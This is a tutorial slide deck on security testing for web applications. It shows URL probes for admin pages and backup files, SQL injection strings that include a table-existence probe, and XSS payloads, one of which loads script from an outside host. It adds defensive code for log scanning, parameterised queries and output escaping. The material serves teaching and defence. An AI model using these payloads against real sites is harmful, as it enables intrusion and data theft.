Security Testing For Web Applications Created by: Kristina Filipyan Reviewed by: Vladimir Soghoyan Ogma Applications

Upload: vladimir-soghoyan

Post on 15-May-2015


DESCRIPTION

Outline:

Causes of vulnerabilities

Security testing concepts

Security Testing Types

Main methods of manual security testing: URL manipulation, SQL injection, XSS (Cross Site Scripting)

Automated security testing tools

TRANSCRIPT

Page 1: Security Testing For Web Applications

Created by: Kristina Filipyan
Reviewed by: Vladimir Soghoyan
Ogma Applications

Page 2: Security Testing For Web Applications

Causes of vulnerabilities

Design and development errors

Poor system configuration

Human errors

Page 3: Security Testing For Web Applications

Security testing concepts

Authentication: the act of confirming the truth of an attribute of a datum or entity.

Authorization: determining that a requester is allowed to receive a service or perform an operation.

Confidentiality: a security measure which protects against disclosure of data or information to parties other than the intended ones.

Integrity: whether the intended receiver receives the information or data unaltered in transmission.

Non-repudiation (session time limitations): interchange of authentication information with some form of provable time stamp, e.g. with a session id.

Page 4: Security Testing For Web Applications

Security Testing Types

Vulnerability Scanning: a method to assess computers, computer systems, networks or applications for weaknesses.

Security Scanning: a Vulnerability Scan.

Penetration Testing: a method of evaluating the security of a computer system or network by simulating an attack.

Risk Assessment: involves a security analysis of interviews compiled with research of business, legal, and industry justifications.

Security Auditing: involves hands-on internal inspection of Operating Systems and Applications, often via line-by-line inspection of the code.

Ethical Hacking: basically a number of Penetration Tests on a number of systems on a network segment.

Page 5: Security Testing For Web Applications

Why is Security testing needed?

To secure financial data while it is transferred between different systems

To secure user data

To find security vulnerabilities in an application

Page 6: Security Testing For Web Applications

Main methods of manual security testing

URL manipulation

SQL injection

XSS (Cross Site Scripting)

Page 7: Security Testing For Web Applications

URL manipulation through HTTP GET methods: examples

Search for directories making it possible to administer the site: http://target/admin/ and http://target/admin.cgi

Search for a script that reveals information about the remote system: http://target/phpinfo.php3

Search for backup copies. The .bak extension is generally used and is not interpreted by servers by default, which can cause a script's source to be displayed: http://target/.bak
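From the defender's side, the same three probe patterns (admin directories, info scripts, .bak copies) can be picked out of a web server's access log. This is an added example, not code from the deck; the log lines, the combined-log regex and the rule labels are constructed here, and a hit with status 200 is the one that matters, because it means the resource actually exists and was served.

```python
import re
from collections import Counter

# Constructed access-log lines in combined-log style (not from the deck).
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2015:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [15/May/2015:10:01:03 +0000] "GET /admin/ HTTP/1.1" 404 210
203.0.113.5 - - [15/May/2015:10:01:04 +0000] "GET /admin.cgi HTTP/1.1" 404 210
203.0.113.5 - - [15/May/2015:10:01:05 +0000] "GET /phpinfo.php3 HTTP/1.1" 200 9001
203.0.113.5 - - [15/May/2015:10:01:06 +0000] "GET /login.php.bak HTTP/1.1" 200 1444
198.51.100.7 - - [15/May/2015:10:02:00 +0000] "GET /products?id=7 HTTP/1.1" 200 3030
"""

# ip, timestamp, method, request path and status code of one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Rules mirror the slide: admin directories, info scripts, backup copies.
PROBE_RULES = [
    ("admin-dir", re.compile(r'^/admin(/|\.cgi$)', re.I)),
    ("info-script", re.compile(r'^/phpinfo\.php\d?$', re.I)),
    ("backup-file", re.compile(r'\.bak$', re.I)),
]

def classify_path(path):
    """Return the first matching rule label for a request path, or None."""
    path = path.split("?", 1)[0]          # ignore the query string
    for label, rx in PROBE_RULES:
        if rx.search(path):
            return label
    return None

def find_probes(log_text):
    """Return (hits, per_ip_counts). Each hit is (ip, path, label, served),
    where served=True means the server answered 200: that finding is triaged
    first, a 404 only shows that someone looked."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_path(m["path"])
        if label is None:
            continue
        hits.append((m["ip"], m["path"], label, m["status"] == "200"))
        per_ip[m["ip"]] += 1
    return hits, per_ip
```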

Page 8: Security Testing For Web Applications

SQL Injection examples

SELECT fieldlist FROM table WHERE field = '[email protected]'';

SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --';

SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
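The third statement is a table-existence probe: it returns no rows if tabname exists and a database error if it does not, and that difference is what the tester reads. The following added example (not from the deck) builds the vulnerable lookup by string concatenation next to the parameterised fix, using a constructed in-memory SQLite table named members in place of the slide's table/tabname.

```python
import sqlite3

# Constructed in-memory schema standing in for the deck's "table"/"tabname";
# the column names follow the deck's third statement.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT)")
    db.execute("INSERT INTO members VALUES ('alice@example.com', 's3cret', 'alice', 'Alice')")
    return db

def lookup_vulnerable(db, email):
    """String concatenation: a quote inside `email` closes the literal and
    `--` comments out the rest, so the deck's statements run as written.
    Returns ("ok", rows) or ("error", message); the error message is the
    side channel the COUNT(*) probe relies on."""
    sql = ("SELECT email, passwd, login_id, full_name FROM members "
           "WHERE email = '" + email + "'")
    try:
        return ("ok", db.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

def lookup_safe(db, email):
    """Parameterised query: the driver passes `email` as one value, so quotes
    and comment markers inside it never reach the SQL parser. The same probe
    now returns no rows whether or not the guessed table exists."""
    sql = "SELECT email, passwd, login_id, full_name FROM members WHERE email = ?"
    return ("ok", db.execute(sql, (email,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    probe_real = "x' AND 1=(SELECT COUNT(*) FROM members); --"
    probe_fake = "x' AND 1=(SELECT COUNT(*) FROM no_such_table); --"
    print(lookup_vulnerable(db, probe_real))   # ('ok', []): table exists
    print(lookup_vulnerable(db, probe_fake))   # ('error', 'no such table: no_such_table')
    print(lookup_safe(db, probe_fake))         # ('ok', []): nothing leaked
```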

Page 9: Security Testing For Web Applications

Cross Site Scripting (XSS)

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">
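The three payloads on the slide show two different injection contexts: text placed in the HTML body (the locator string and the SCRIPT tag) and a URL placed in an attribute (the javascript: image source). The added example below (not from the deck) renders both safely: HTML-escaping handles the first context, while the second also needs a scheme allowlist, because javascript:alert('XSS') contains no HTML metacharacters at all. render_comment and render_avatar are hypothetical names.

```python
import html
from urllib.parse import urlsplit

# Payloads quoted on the slide, reused only as inputs to check the rendering.
SCRIPT_TAG = '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'
IMG_JS_URL = "javascript:alert('XSS');"
LOCATOR = "'';!--\"<XSS>=&{()}"

def render_comment(text):
    """Untrusted text placed in the HTML body: escape every metacharacter
    (&, <, >, ", ') so the browser shows it as text instead of parsing it."""
    return "<p>" + html.escape(text, quote=True) + "</p>"

def safe_image_url(url):
    """Untrusted value placed in a src attribute. Escaping alone does not
    help: the javascript: URL is attribute-safe as text yet still executes.
    Allow only absolute http/https URLs, then escape for the attribute."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return html.escape(url, quote=True)

def render_avatar(url):
    """Hypothetical profile-image renderer; falls back to a default image."""
    safe = safe_image_url(url)
    if safe is None:
        return '<img src="/static/default.png" alt="avatar">'
    return '<img src="' + safe + '" alt="avatar">'
```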

Page 10: Security Testing For Web Applications

XSS Attack example on RockSquare (screenshots: XSS Input; XSS Attack Results)

Page 11: Security Testing For Web Applications

Automated security testing tools:

NMAP (free source): Security scanner used to discover hosts and services on a computer network.

GFI LANguard (licensed): Network Security Scanner and Vulnerability Management Tool.

Page 12: Security Testing For Web Applications

What is Zenmap?

Zenmap is the official Nmap Security Scanner GUI.

Zenmap action shots: Nmap Output, Hosts and Ports, Topology, Host Details.

Page 13: Security Testing For Web Applications

Nmap Output:

The “Nmap Output” shows scanning results.

Page 14: Security Testing For Web Applications

Hosts and Ports

The “Ports / Hosts” tab shows all the hosts which have that port open, filtered, or closed.

Page 15: Security Testing For Web Applications

Topology

The “Topology” tab is an interactive view of the connections between hosts in a network.

Page 16: Security Testing For Web Applications

Host Details

The “Host Details” tab breaks all the information about a single host into a hierarchical display.

Page 17: Security Testing For Web Applications

The goal of Nmap

Nmap sends specially crafted packets to the target host and then analyzes the responses.

Nmap can determine the operating system of the target, names and versions of the listening services, estimated uptime, type of device, and presence of a firewall.

Page 18: Security Testing For Web Applications

Thank You